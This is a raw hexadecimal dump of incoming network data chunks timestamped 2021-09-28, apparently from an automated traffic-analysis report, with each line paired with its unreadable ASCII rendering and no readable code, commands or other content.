e7 bb 8a 2a 15 69 d3 1c 04 ea fe a4 53 c0 c0 f9 f3 3b 1f 3f 7b c0 61 48 bd cf 04 aa d4 3f 43 78 b6 c2 e5 96 6d 87 99 a8 72 6f 55 dc 50 16 b4 7f 7a 0f fd 7e 29 d9 e8 d0
                                          Data Ascii: *q?g%tl2Zg-"~`x lT<f~]!HZ+5!b3;^Z8e!B;:QD8[`cm$'!zrsg7a'CIDyWvVA l#:yF'W)lOa.}mLBL^, *iS;?{aH?CxmroUPz~)
                                          2021-09-28 06:58:06 UTC183INData Raw: 61 68 96 da da 72 92 4f f3 e7 5a 99 d3 38 8b f9 db fb e8 af 62 e0 6b de 7b 80 46 03 b8 70 62 9d d0 cc dc b3 24 63 ce d1 b5 6f d1 60 eb 87 94 dc 7d d5 8c 55 6b a5 b1 55 57 10 14 b9 b2 67 53 94 1a d5 1a a6 19 f7 ef 5a 14 7d d7 bd 3b e7 9e d7 93 05 0f dc a1 c5 73 9a 73 8b 35 61 3f d3 7c 7e ed 60 27 41 f5 7c 56 38 34 cb fb 6e ba d6 7f 10 60 cc c7 6f d5 2a de de cf e7 07 32 89 3e dd 11 cc 8c 9f 8a 52 50 6f 3a f1 02 ce 26 46 b6 87 0f 12 73 48 1b 7b d5 8e 13 13 13 08 05 26 93 30 0e 50 64 b2 b6 d7 89 5b c8 51 18 9e 32 6e bf 41 13 d4 ee e6 e6 f0 a8 7f 24 d0 d2 b9 21 c1 2b af 00 b5 d6 03 d4 9d 85 41 d6 92 7e 38 ee ee 10 4f 49 ac cd 32 3b 6e 78 7f 68 a2 67 1f d1 de 74 7a 31 eb 4b d5 55 c4 3d c2 a2 f2 de a4 f2 5a 10 2b 47 d9 07 6d c1 d0 f3 6d a7 66 1a 3a 87 23 19 1e
                                          Data Ascii: ahrOZ8bk{Fpb$co`}UkUWgSZ};ss5a?|~`'A|V84n`o*2>RPo:&FsH{&0Pd[Q2nA$!+A~8OI2;nxhgtz1KU=Z+Gmmf:#
                                          2021-09-28 06:58:06 UTC184INData Raw: 71 2d 03 0b c1 8d ac 61 29 27 c0 a6 53 c0 56 6f 01 66 ff db 04 bd 2e db 83 cd 04 aa 42 a9 fa 5b 63 26 9a eb 1d 35 a7 aa 72 6f c3 4a 4c 9c 54 9b 05 72 6c 2e 16 db e8 d0 1c de ac 00 85 e0 64 f4 08 d5 31 86 94 97 f0 93 fe e7 df f6 4c 82 c9 0c bd 3b 32 70 57 5e 55 f6 ac b3 76 3e 7c 60 aa c8 c0 31 64 9d 9c 57 5b 87 49 72 90 f6 69 44 69 69 cf de cb cf b2 b8 22 d0 ec 75 20 7f 82 56 bd a0 b1 a5 de 10 1c 5f ad 85 36 31 1b 00 26 b8 2f d5 8b 33 5a 3c 6a 71 b9 6d 7b 47 6d 2b 73 12 c5 ed 72 75 35 71 e5 25 5d 06 85 60 7e 99 4f 19 04 d5 00 d6 8a 9a 16 b9 5e ee 2b 3b 59 1e 97 25 71 9f af 54 a2 9e 8b 5f c8 c2 65 2c 60 93 e9 4e 0f 68 33 29 68 50 7b 4a 25 7b 50 73 bc 01 00 55 09 17 1d de 3b ca 30 96 e2 d0 a3 15 42 b3 a2 42 fb be 2d 96 ca e1 d9 cd 2d d5 47 67 50 38 d5 99 b4
                                          Data Ascii: q-a)'SVof.B[c&5roJLTrl.d1L;2pW^Uv>|`1dW[IriDii"u V_61&/3Z<jqm{Gm+sru5q%]`~O^+;Y%qT_e,`Nh3)hP{J%{PsU;0BB--GgP8
                                          2021-09-28 06:58:06 UTC185INData Raw: 56 d4 9d dc 91 93 76 c7 03 ae cd 32 ad f8 ac 7b a6 46 18 62 59 79 3e 78 31 eb dd 43 96 b4 de 26 dd 8f 74 e1 b9 58 10 2b d1 4f 4f d8 0a 34 8c 10 6c 05 51 38 87 23 8f 88 1d 71 d8 20 6f e0 00 2d 8e 9a af aa 0a 23 f1 39 3d bf a7 a8 3d e7 08 91 5c 69 6f 20 77 31 fe d7 b3 c6 c1 c3 a4 3a fd 5a 2c 27 33 ab ca a6 32 28 d8 11 b7 24 ee 54 4e 81 57 5a 92 11 2b 30 2e d2 8c 5f 67 3e b6 60 3c 38 fe ce 89 6e 90 95 55 aa d7 14 89 80 7d 20 e7 f9 8a 33 a1 48 5a bd 25 c3 d6 f0 eb 5c cd e0 5a 0e da 8a 23 0b 3f 3a 79 6a 58 92 38 34 f0 fa ec 87 23 d4 3b 54 8b 97 47 ff 38 c1 8f 2b e1 5b 60 22 d3 01 cb 85 ea ba c1 0f f3 82 9e 6d 01 92 bb bf 8b f6 e1 5c f5 ce 49 e0 be 95 ac e5 f7 91 21 00 31 e9 61 f2 d4 51 4a 44 c4 47 b6 b9 51 45 be 65 66 58 37 88 f4 92 f9 19 0f 76 b0 e0 ad 2c 9b
                                          Data Ascii: Vv2{FbYy>x1C&tX+OO4lQ8#q o-#9==\io w1:Z,'32($TNWZ+0._g>`<8nU} 3HZ%\Z#?:yjX84#;TG8+[`"m\I!1aQJDGQEefX7v,
                                          2021-09-28 06:58:06 UTC187INData Raw: 49 96 77 1e 12 ec 0b 1d 36 30 a8 ff 54 30 2a c0 f0 2c 93 bd 1d 03 c4 08 a2 80 b4 93 68 d7 1b 8f 54 e7 81 41 34 8a c9 6e 27 b7 e5 04 72 a7 54 44 13 56 99 51 a1 42 66 62 cb 9b 5a d5 4d 27 ba ef 64 5b 04 58 6c 55 40 e7 c1 63 a8 ef 30 52 83 1c 87 01 6f e1 c2 e0 2c 18 c8 f0 fe 5b 9d 0e d5 6d 3b 3d 6a 12 21 a0 40 44 c1 03 6b cb 2e 7d 04 8f 3e 5b a8 c1 2b 8b 58 4c 66 c6 72 87 03 17 e4 7c 0f 47 62 b9 63 d7 4e e9 61 3b ac 51 bb 89 77 b6 b3 c1 80 7e b6 59 a2 8d 31 f3 9c 0e d8 9c a1 54 11 80 83 f3 70 b5 9f 65 ef b8 21 1b f6 ed 51 8f 34 58 af df cb ce d9 3e 5b 0f fe 84 d1 e1 bb e9 3b fd 79 46 fa b5 56 fc 40 23 60 61 37 90 3d d6 c8 84 b9 64 b8 79 29 62 23 46 42 13 bf 39 69 b9 d5 0d 3b 89 ab d4 26 5e ed a0 3a a1 6f 16 f3 c1 d7 e6 7e 42 7f 11 7b f3 3e af d0 06 3f d8 75
                                          Data Ascii: Iw60T0*,hTA4n'rTDVQBfbZM'd[XlU@c0Ro,[m;=j!@Dk.}>[+XLfr|GbcNa;Qw~Y1Tpe!Q4X>[;yFV@#`a7=dy)b#FB9i;&^:o~B{>?u
                                          2021-09-28 06:58:06 UTC188INData Raw: 10 fb 2b 9e fc 14 fb be 2e 8a 61 e3 1a fc c7 4d 43 8c fe a2 fc f3 ab 06 9c 31 d8 65 dc d2 dd 43 65 c0 7d 83 15 56 d4 bf 54 65 eb 39 a1 f0 a8 cc 1a 0c 4f b4 da 98 2f 98 57 cd 92 fe 5d c0 ab 27 58 f8 60 7f 35 8f 19 9b 75 2d b2 9a 0c 3d f5 86 f8 1c 53 0b 47 c3 91 79 fd 5b f9 48 38 b8 82 2d c7 ab c0 fc 9e 2e 9c e3 bc 8b 2e 34 85 da 50 05 82 ce 7d 51 f1 c1 f0 d2 58 12 70 79 ed 68 b7 8a dc 05 8b f8 6c 46 2e 84 7d e8 a3 66 17 a1 34 41 b5 5c c6 50 a5 97 8a 78 6b f9 47 31 c8 e8 f1 8e e4 93 05 63 d3 1d 08 a8 a8 32 0a 94 a3 6e 53 80 55 39 26 31 62 17 56 bb 98 01 97 ca 77 4e 70 44 a9 07 bf 8e 09 8d 08 c0 b0 f6 15 15 90 be ac 35 a3 a0 b2 60 7d 6b 76 6b 79 94 69 55 80 7a 10 d5 60 23 e0 a6 0f 27 31 7c 43 15 75 6d 36 f4 b0 18 b1 17 f1 b2 15 f0 52 61 d8 25 2a 38 8d be cc
                                          Data Ascii: +.aMC1eCe}VTe9O/W]'X`5u-=SGy[H8-..4P}QXpyhlF.}f4A\PxkG1c2nSU9&1bVwNpD5`}kvkyiUz`#'1|Cum6Ra%*8
                                          2021-09-28 06:58:06 UTC189INData Raw: 9e 66 ff 68 d4 66 09 18 e8 ec 44 74 6e 92 1a 19 6c d7 e0 6f eb 2e 26 c7 4e e7 33 5f 98 3e d9 10 60 a9 d9 ac 48 52 26 32 43 4d 30 26 9b 98 3f 0e af 76 45 17 3a d6 23 5b 9f 09 73 03 b4 92 c9 2e 17 61 cb b7 32 c0 c4 cf 55 19 9f 33 98 bb f6 15 e6 cb 5e bb 9b ac db 33 dc c9 b3 03 1d 0c c1 00 8a 98 a9 d8 d4 84 46 d0 ef 5e 1e ec 02 16 30 0d e7 cc c3 3b d1 70 d3 5b dd 63 58 f4 35 3c e1 37 28 69 8e 4e 2c 3e 31 b4 5b c5 17 bd 89 0b 20 5b fe 01 e5 c9 c7 f3 b9 a1 fb 40 29 9b 72 1d 81 fc 5e 3f 33 14 0e cb 3c 90 cb ab 02 ae 92 8b 6f df 0b df 19 37 3e 0c ab 79 3d e5 01 11 09 3d 15 ce e7 f0 08 8d 1f f9 93 bc ea 14 8a 2f 85 4e d2 ac 63 a8 05 ef ae fe 9b d4 a1 74 0b 71 eb 58 13 88 65 42 2d 27 11 7c 40 4b bb e9 9f 90 22 5b d0 db f1 8b ba 59 33 e7 48 9b 9a ae 01 5b 79 35 d2
                                          Data Ascii: fhfDtnlo.&N3_>`HR&2CM0&?vE:#[s.a2U3^3F^0;p[cX5<7(iN,>1[ [@)r^?3<o7>y==/NctqXeB-'|@K"[Y3H[y5
                                          2021-09-28 06:58:06 UTC191INData Raw: 1d 1f dc 9c 5f 55 33 9f 4f 74 db a3 5f 4c eb 6e 05 df a6 fd 47 ba 66 d3 3e 0a b9 56 bb 55 a3 b6 56 a7 01 11 db 4c 54 f8 68 30 39 25 77 bf 8e c3 d9 1f b7 3c 72 24 f0 5d 5e 43 fa 2f d8 3e 07 ee 76 71 1b 17 5b 21 3c 07 22 73 5e aa 98 1f 57 c3 20 88 39 9a 23 a2 c5 ec 17 37 30 0c d6 0f 42 cb 3c 41 eb 9f cc 5f 3d fd 43 2e 9c 92 16 14 53 6b 6a 28 7f 40 43 64 da 71 17 56 8a 54 23 5d 33 32 98 de dc d0 f4 b1 58 d7 88 41 f4 9d 32 42 7c bf 20 8a a6 e5 b5 cc 6e ac 80 62 3c 39 08 a9 68 57 e9 c6 5a ad 7c 6f 8f ff 44 8c 9b f6 87 db 45 69 22 44 c6 a1 69 9a f2 47 75 f7 77 a7 10 b0 6f 18 66 ac e5 d3 7b 75 fb 30 ba ce 70 90 c3 48 ee 44 39 d2 f0 53 ec 4e cf ef 60 fb c2 38 c2 f1 77 de 10 b6 8a e2 1b de 59 c7 4a 03 a9 70 f4 9d f8 c8 2f b1 65 61 82 96 ae 6f ed 62 73 87 75 c6 9b
                                          Data Ascii: _U3Ot_LnGf>VUVLTh09%w<r$]^C/>vq[!<"s^W 9#70B<A_=C.Skj(@CdqVT#]32XA2B| nb<9hWZ|oDEi"DiGuwof{u0pHD9SN`8wYJp/eaobsu
                                          2021-09-28 06:58:06 UTC192INData Raw: a7 27 3a a3 3f a4 52 28 aa 70 9e 24 ab 54 98 80 e2 58 31 13 16 31 49 b2 93 5f 07 3f 34 78 61 1d 18 cf df 6e d5 95 d4 ab ed 35 ce 80 dc 21 cc f9 df 23 60 49 71 bd 70 d3 17 f1 f8 5c c0 f0 b9 0f f1 8a 76 1b 3b 38 6a 6a 45 b2 38 36 db fa a9 a7 02 d6 e0 5f cf b7 66 fc 23 c3 cb 0b 22 58 8b 22 d9 13 28 86 01 ba ea 2d 12 86 45 66 44 b2 7c ba 20 e4 a6 5c 5f c9 3a f7 bc b7 61 e2 84 86 20 22 dc ee 12 e5 c7 43 40 4c b7 50 a5 ab 11 4f 3d 65 33 48 17 84 3f 80 ac 09 cc 61 a3 ed f8 3c 18 2c 6a 30 02 c1 64 c8 80 f7 26 fc 74 64 c6 74 80 b9 70 eb 8d c1 49 2e 99 a9 78 14 37 9d 3c f0 66 6d b4 11 5d 79 44 b0 29 d4 b5 98 d7 2e 4b 28 d6 2d dd 17 14 8f 86 69 33 74 dc af 6a c0 de 66 c8 64 07 d0 44 bd 7f 81 be cd 1a a3 99 a9 14 47 ca 24 b0 e3 3c 66 f2 a2 21 6f 02 42 24 9f 4a 91 0e
                                          Data Ascii: ':?R(p$TX11I_?4xan5!#`Iqp\v;8jjE86_f#"X"(-EfD| \_:a "C@LPO=e3H?a<,j0d&tdtpI.x7<fm]yD).K(-i3tjfdDG$<f!oB$J
                                          2021-09-28 06:58:06 UTC193INData Raw: 3c 27 cb 11 86 a1 75 61 69 00 cd ca 79 74 4f 8e 9a 5a cf d1 3a 8b 87 4d e8 d0 b7 84 9d 16 cd 59 c5 44 1d b9 65 f4 9c ea d7 3b a4 59 61 8a b6 b6 78 d1 61 7d a6 59 d1 9b d5 f1 77 0f fb b3 54 57 33 83 a0 d6 61 b5 b2 66 ce 9d e0 1b d2 ee 41 82 7f 59 80 dc f8 e3 d6 3a 65 0c c1 a1 c7 e5 b2 ea 90 d3 62 42 fa b6 26 ef 62 27 6b 62 5d a0 19 d2 e2 87 4f 57 93 7d 3e 61 ef 51 6e 17 01 39 ff b2 e5 09 4a 8a 1b dd 10 5a bd a0 8e b4 50 12 08 c0 6d cc 27 46 85 10 28 fe 75 ae 2d 07 fc df 5a 11 26 09 2c b0 91 5e 19 b7 4d cf b7 a5 f6 58 e3 51 1a 08 0a 79 97 a7 10 a9 d7 73 83 f2 aa 7f 1e 47 fd 32 04 27 12 d3 2f 03 9c 01 e8 9c b4 d7 d7 d5 46 df dd 93 12 98 3f af fe 32 3a f8 47 7c 73 44 67 62 91 27 09 78 30 eb 0a 42 60 b5 3a 24 e2 8e e9 be ba 58 53 2a 70 4f 05 df a8 37 c8 10 a6
                                          Data Ascii: <'uaiytOZ:MYDe;Yaxa}YwTW3afAY:ebB&b'kb]OW}>aQn9JZPm'F(u-Z&,^MXQysG2'/F?2:G|sDgb'x0B`:$XS*pO7
                                          2021-09-28 06:58:06 UTC194INData Raw: 96 90 30 d0 bd 40 22 aa d0 42 e3 a7 32 8b 41 fa de d4 15 80 12 7e 3a 38 32 99 35 53 e7 c3 87 b6 e4 45 18 fc 07 80 02 f2 1c de bc 5d 0b 6f 80 ae e3 b8 e3 40 2b fe d1 ac b5 ba 08 09 d6 bd 3d c6 41 67 f2 25 8f dd a7 84 65 6e b3 7c dc ce 38 62 7c 58 e1 fc 27 c5 5d 26 9b d9 76 db 90 96 bf c1 11 fa c9 e2 ee 2b 09 58 21 b5 f1 e1 91 98 69 48 e9 ba b7 6e f4 60 a8 a7 5a c6 db d6 d6 55 17 fe b6 55 13 11 e5 b9 92 6f b4 96 24 d4 f6 e1 7c f6 ee 5a c1 7c 34 a6 d5 e3 e2 d7 3a 43 74 dc fa f4 e7 9a eb 8e a8 63 df e3 b5 39 a9 61 5a 41 a2 6a a2 18 d2 c8 f9 6e ff 81 7f 10 60 cd d0 6f d8 1c 3a dc b2 e6 8a 7a b7 19 da 11 5a 8d 24 ab 10 63 15 3a 82 4b 4b 26 b7 b1 13 0f bd 76 27 19 0d e5 dc 5b 52 12 83 05 28 a2 5d 2f b6 67 7c b6 7d cb 51 c8 12 19 bd 32 fb bb a6 11 a9 ef b3 ae f5
                                          Data Ascii: 0@"B2A~:825SE]o@+=Ag%en|8b|X']&v+X!iHn`ZUUo$|Z|4:Ctc9aZAjn`o:zZ$c:KK&v'[R(]/g|}Q2
                                          2021-09-28 06:58:06 UTC195INData Raw: a5 25 00 2a b0 76 90 a9 06 2a f7 0b 02 79 05 88 bc df a8 4a 5f 3e f1 d2 88 0a 98 2b f1 67 8f a5 87 bc 1a c8 c4 eb 3e 51 a6 48 a4 ff 65 ce df f0 1a 10 a1 ef 2f 28 19 ab fe be 44 2b 7e 5b 74 79 db dd 7c 8b fe c5 be 16 1c 1c aa 42 ee 6a 4b ea ef 61 46 35 c2 e5 12 c0 84 2e f3 21 58 d9 3f fc 61 cf c0 cd 4c eb d4 c8 02 4f e7 65 e7 88 2c 66 c1 eb 72 28 30 3e 1d f0 d6 ec 14 17 bb 14 78 be a6 b1 e7 bb f7 16 05 a3 19 93 fa 86 5b c7 94 d0 03 e7 dd 8b 55 81 5c e7 55 31 d9 54 40 1d a0 2a 26 8e 24 f0 0b 7c c8 33 eb 8a c0 75 b0 9d 46 16 bd c3 76 72 c0 e0 6b 0c 2b 69 38 9c 9c ba 16 ba 3c 92 d5 45 60 7f e7 14 2b c6 3a a6 5f 50 61 37 b5 d1 7c 7c 5a 43 b0 fa a9 c2 2e 72 27 78 55 25 fe 2e 7b 01 b8 2b 27 55 23 a7 4c 75 ca 66 e7 47 1e 06 70 23 45 e4 ea 1b 1c 96 c0 e4 cb 9a 71
                                          Data Ascii: %*v*yJ_>+g>QHe/(D+~[ty|BjKaF5.!X?aLOe,fr(0>x[U\U1T@*&$|3uFvrk+i8<E`+:_Pa7||ZC.r'xU%.{+'U#LufGp#Eq
                                          2021-09-28 06:58:06 UTC196INData Raw: 78 b4 7d 3f c9 d9 fc b4 10 4a 3a 82 12 cc 62 1e b6 54 57 fe 31 f6 19 41 8d df 13 49 13 69 5d b0 f1 06 2f d5 3e cf d2 fd c1 3c 90 51 7e 50 32 1f e2 a7 53 f0 ee 31 f7 f2 ec 26 24 03 8b 32 43 7e 29 95 59 03 d6 58 d4 fc dc d7 b4 8c 7b bd b5 93 74 c1 01 cb 94 32 5d a1 78 1a 19 44 27 38 d1 65 66 78 75 b1 4b 06 0f b5 7e 7e a0 c8 84 be f3 02 10 4a 1d 4f 65 85 ec 55 ab 10 c3 00 53 5d dd 23 7f d2 e8 17 64 22 75 85 98 2d fa fb c3 df f9 7c d0 3e a8 d8 ae f7 45 e6 66 e4 39 36 a6 20 52 52 18 96 af c6 b5 c2 a6 7f 9c 5a fc 46 1a e5 4d a4 07 49 8a 10 d4 24 8c 35 d8 e2 a8 58 10 72 56 55 3b b2 e8 3e 67 59 46 78 14 7c 78 a9 91 1a cf d1 35 de a7 35 f8 e5 08 7f a3 98 ee 42 a0 18 28 d2 41 b6 b4 84 8e 38 99 91 2d 6f da cd 56 6f 74 58 13 0f 3b c6 7c 55 84 9b ec f7 53 bb 51 31 e9
                                          Data Ascii: x}?J:bTW1AIi]/><Q~P2S1&$2C~)YX{t2]xD'8efxuK~~JOeUS]#d"u-|>Ef96 RRZFMI$5XrVU;>gYFx|x55B(A8-oVotX;|USQ1
                                          2021-09-28 06:58:06 UTC198INData Raw: 30 4e a0 3e d4 57 7f 28 32 96 b6 51 31 48 65 de dc a7 a7 1e 42 46 5b 73 25 f6 0c 12 2b b6 4e 13 65 42 88 6a 75 ea 41 83 77 3c 68 74 05 45 c3 db 7e 1d b0 ae f6 e1 fb 7a fa a9 8d 7e 5a bf 59 84 41 da a5 db 3b c9 fb 1d 1d 62 bf ea 40 54 fd 9b 74 66 0d 33 6e 9b 24 59 20 b5 10 5f 1c f7 39 67 3b 7d 41 ea ac f9 b0 b4 f8 fa d0 ad 05 2e c6 cf 27 1f df d4 fe 49 e3 ed 89 2c f3 35 08 23 59 21 f5 28 53 d1 90 b1 c5 62 25 82 94 20 e7 13 98 33 d9 b2 35 2e 07 9a cb 3f da 32 20 64 82 bf ee 91 df 7f 75 94 ad 16 a1 61 00 05 5c 42 8f 78 f5 cd 1e 29 09 6e be a6 13 74 1e ef 81 3f 96 b0 56 ef 95 28 fb 82 c3 ea 96 7f b3 3c 93 3d 73 dd 38 95 f3 8e a4 5f b1 0b 06 e6 f3 d6 1c b4 28 1c e9 3c aa fe d7 b2 27 6b 83 c7 30 1f 71 ec dd ba 06 b5 d1 02 a1 c9 98 6b 92 a9 28 ed 10 11 c7 b3 81
                                          Data Ascii: 0N>W(2Q1HeBF[s%+NeBjuAw<htE~z~ZYA;b@Ttf3n$Y _9g;}A.'I,5#Y!(Sb% 35.?2 dua\Bx)nt?V(<=s8_(<'k0qk(
                                          2021-09-28 06:58:06 UTC199INData Raw: 19 11 78 37 ac 9e 0b f3 e1 17 c5 aa 59 ee e3 08 49 88 97 d8 42 d3 2d 5a f5 41 a7 a7 a7 8e 3e 8f 95 2a 7e b5 e4 40 7e 3b 7d 1c 1e 0a d7 4b 44 9f 94 9f c2 21 97 57 3b f9 d2 46 bb 51 b2 fe 64 90 3e 60 76 b1 68 99 e4 98 c9 a7 2f a3 e7 e8 08 73 c1 da bf c8 84 86 3d 82 ab 49 ad ca d9 dc 8c 94 f0 50 54 71 8c 0d 97 a3 20 3d 21 c4 00 c3 dd 19 20 c7 07 19 29 41 ec a7 e6 88 7d 69 76 f5 84 d4 48 f7 6c 8b 50 a3 96 b7 9b 41 89 98 8f 0f 05 ff 19 91 fd 42 8f fb b5 4c 26 eb cc 6c 43 6d fc a7 af 0f 04 38 7c 42 2d d4 ca 6d b5 cf c2 8c 4f 68 49 84 6c fe 6b 55 e6 b3 14 70 11 c2 f5 07 81 94 07 81 01 78 bd 38 c9 15 fa e8 af 71 de b1 a9 00 20 e8 54 8e 87 08 14 e2 cf 1c 0a 27 2b 24 fa d6 d8 0c 06 8f 14 76 ae 9c b5 8a 99 c3 7f 07 a3 6d 80 c9 ef 51 f3 e0 f2 66 db ee 88 49 bf 54 fb
                                          Data Ascii: x7YIB-ZA>*~@~;}KD!W;FQd>`vh/s=IPTq =! )A}ivHlPABL&lCm8|B-mOhIlkUpx8q T'+$vmQfIT
                                          2021-09-28 06:58:06 UTC200INData Raw: 77 8d 2d b5 2d 6d df 70 b0 f2 9d a6 56 de 38 07 d9 e2 c5 06 bf 07 7d c0 3d b2 cb a5 98 23 6f 96 d6 05 25 7f e4 d0 ba 06 e6 e2 15 bc f3 86 1b b4 80 37 f2 1c 2b c3 8e 91 91 be 54 25 0d 88 ce 96 91 e8 82 e1 b4 63 05 b6 c3 6a 9b 12 4e 2f 04 7c f3 6d b0 ba f2 1c 3e ff 1a 10 33 b5 22 1b 72 43 16 98 c0 86 7e 13 e5 59 dd 45 35 d9 ed c4 da 35 12 6e ae 06 a3 48 21 b6 76 6a 8a 28 cb 77 67 b7 b3 3e 5d 7c 6f 05 c3 f6 2a 70 d3 08 ae d4 c9 a4 15 a7 36 18 6f 57 0c e5 ea 62 ce ee 30 c6 f2 eb 17 24 02 ba 32 40 4f 29 94 68 03 d9 69 d4 d5 ed d7 b7 bd 7b bc 84 93 5d f9 75 cd a5 32 5f 90 78 18 28 44 03 0a d1 41 54 78 56 8e 3f 1c 05 d4 4b 57 d7 e0 ac da f3 39 63 43 47 0c 68 b2 9c 43 85 75 ef 3b 20 50 87 65 75 fd 9b 18 3e 6f 73 94 84 72 eb ff db f5 d9 5b ea 5d ae c9 bb ca 5f e2
                                          Data Ascii: w--mpV8}=#o%7+T%cjN/|m>3"rC~YE55nH!vj(wg>]|o*p6oWb0$2@O)hi{]u2_x(DATxV?KW9cCGhCu; Peu>osr[]_
                                          2021-09-28 06:58:06 UTC201INData Raw: 13 e9 ec cd 63 cf a0 f6 14 1f e4 56 86 86 6d 01 c0 de 2d 3f 34 38 31 f2 b2 fb 15 72 9e 10 14 bf 85 d0 ed bb c2 49 2a 96 7c 99 bb f5 56 f2 cb de 12 f6 e6 e4 6f 95 44 ee 68 18 da 4f 7b 04 a4 33 4f 86 2f c5 54 78 e3 5f cd 9b b9 42 86 f8 6e 54 f2 f5 51 00 e6 d6 02 2a 0e 3a 20 ad e8 bd 39 ba 39 bd d5 46 4f 7f d1 2f 46 cd 1d d2 4a 7b 02 1e 9b b6 5b 43 72 74 d8 d5 ea 8a 0c 42 4f 7d 7a 42 d4 1f 12 33 93 46 60 5a 77 9d 66 18 ab 77 86 4b 39 69 7e 60 0c c3 db 62 09 a1 af d6 fa fb 78 ca ae 81 64 52 bf 59 84 50 fe cb ef 3a a2 dd 73 5f 43 b6 83 6b 73 93 ab 75 0d 2f 5d 29 b6 3e 1c 1a ac 3b 42 1c f5 31 63 3b 09 5e f8 92 f9 a5 a2 f8 fa 95 8a 24 29 d2 cc 42 0f d0 b6 f1 42 e3 c0 a3 45 cc 20 09 50 5f 26 ed 12 00 fb b1 b1 d2 65 44 ad 92 2a ff 37 86 39 b4 b5 39 18 0d 8a c7 53
                                          Data Ascii: cVm-?481rI*|VoDhO{3O/Tx_BnTQ*: 99FO/FJ{[CrtBO}zB3F`ZwfwK9i~`bxdRYP:s_Cksu/])>;B1c;^$)BBE P_&eD*799S
                                          2021-09-28 06:58:06 UTC203INData Raw: 44 1d 52 9e 3f 2a 3a db 38 61 ce f9 b7 cc d4 36 10 78 33 3d 6e b1 8b 75 9e 7d d7 3b 21 51 f4 4c 77 88 ba 05 50 22 75 85 98 2d cf ee dd c6 d7 46 f6 7a b4 ca b4 a8 54 e2 7e ce 0f 01 90 46 64 78 7d ac 8a a9 86 cd a6 5d 98 2e e5 66 76 d6 67 c1 36 6c e5 06 db 24 bd 3b bb ea ac 2c 27 7b 23 44 3e dd f9 31 67 7c 48 78 3f 72 78 8a 9b 6e d5 fa 54 ec a9 35 cc ef 7c 68 88 f9 d9 4c cd 38 3b cf 50 87 b8 f0 a8 33 ad 89 0d 61 da eb 5c 1b 59 55 79 09 37 b2 5c 5b f0 9f 83 a7 46 b1 4f 0b c3 d9 20 90 38 88 e3 6a 84 3e 23 4d a7 74 aa cc 84 dc ad 2f b7 eb fb 01 65 fb d1 d9 e4 f6 a5 35 9a ab 00 8e d9 da a8 a6 82 fd 57 55 47 8c 28 9c a2 2e 49 02 ad 2b c3 ff 37 37 cd 0c 19 26 7a e6 92 fd e9 4e 69 02 e6 85 cf 4f f1 71 a7 6b a2 87 ab fa 70 80 8f b5 1a 08 e2 06 f0 cd 4e 8c f0 88 47
                                          Data Ascii: DR?*:8a6x3=nu};!QLwP"u-FzT~Fdx}].fvg6l$;,'{#D>1g|Hx?rxnT5|hL8;P3a\YUy7\[FO 8j>#Mt/e5WUG(.I+77&zNiOqkpNG
                                          2021-09-28 06:58:06 UTC204INData Raw: 3a 7b 17 c8 ac f5 b0 a2 f1 cf a2 8b 2a 25 d0 d6 07 1f cc d9 e0 2c a0 c8 a8 24 f2 15 15 3f 52 26 fa 39 16 ea b1 bb c5 0b 17 8b 89 0a f4 1e 9e 33 ba 92 1f 18 1a 80 db 53 ec 5d 24 6a 93 94 e3 82 c3 74 6b f1 ca 21 a0 50 3a 19 5c 45 ac 63 d4 c4 19 08 05 61 b6 99 13 04 2c fc 86 2e b1 a3 38 c2 bc 23 8e bd d3 f6 83 62 b1 2b c7 09 62 d6 11 93 f8 87 ad 54 c5 16 01 e0 f3 d4 1b 94 0e 08 ea 3d b4 fa a3 9e 27 0e a5 d6 21 12 7e f7 d4 b3 11 d4 e2 08 a7 9d a0 78 83 86 2c e3 09 36 d4 dd cb 80 a3 55 30 0d f2 c2 a6 91 f5 99 8f 9e 0c 2c ba c3 56 9d 60 64 33 06 1d d4 7d 96 ac e5 1c 2e e1 09 7f 12 cc 12 1d 72 4f 4c b9 f7 89 6a 08 f2 4e a9 7e 28 8c f3 ce d5 36 5b 54 b5 1a b8 54 46 ff 7f 5c 8a 05 ae 54 6f b1 8c 2f 7c 67 5b 71 c2 93 39 4a c2 39 87 d9 d0 b3 59 8a 22 18 4b 41 78 fe
                                          Data Ascii: :{*%,$?R&93S]$jtk!P:\Eca,.8#b+bT='!~x,6U0,V`d3}.rOLjN~(6[TTF\To/|g[q9J9Y"KAx
                                          2021-09-28 06:58:06 UTC205INData Raw: e2 23 72 50 8e 04 8a 8b 31 3d 2d ab 29 d5 a9 35 20 ca 3a 31 3a 5c fd 84 e1 e9 6e 69 02 ef a3 d5 5d ea 6d c9 65 a9 95 87 92 42 97 8e dc 3c 01 ff 35 fc d8 40 86 db af 4a 49 e8 cc 6a 6f 2e ce b0 8b 09 08 21 37 16 10 d1 dd 7a a7 ab c3 8d 40 68 49 8a 48 c2 7a 4b ff b4 13 77 74 a5 c3 27 9f a1 0b 85 05 77 ba 1c d9 31 e9 f3 ac 69 cf a0 cc 31 3c 85 57 82 9f 32 07 c1 dc 13 01 36 2f 34 cf d3 eb 19 1f 98 09 71 a9 9b d0 cf b0 d5 79 07 87 6b a4 da f4 52 eb f1 e3 03 e1 f8 e4 76 84 54 f0 7d 2b d0 49 41 70 8c 3f 21 80 2d d4 66 5b e4 47 eb a4 a1 42 81 9d 40 3b d3 e1 5d 06 ee cd 05 25 05 2a 36 b3 ec b9 26 df 10 b2 bf 44 41 0b ce 33 58 d3 78 e0 51 7e 04 1e 94 b2 51 42 68 00 d7 dd 9e 9d 3e 44 44 5f 73 56 c8 6d 3c 22 8f 68 15 64 51 8a 61 01 fb 57 88 46 38 75 60 60 0c d0 e8 7f
                                          Data Ascii: #rP1=-)5 :1:\ni]meB<5@JIjo.!7z@hIHzKwt'w1i1<W26/4qykRvT}+IAp?!-f[GB@;]%*6&DA3XxQ~QBh>DD_sVm<"hdQaWF8u``
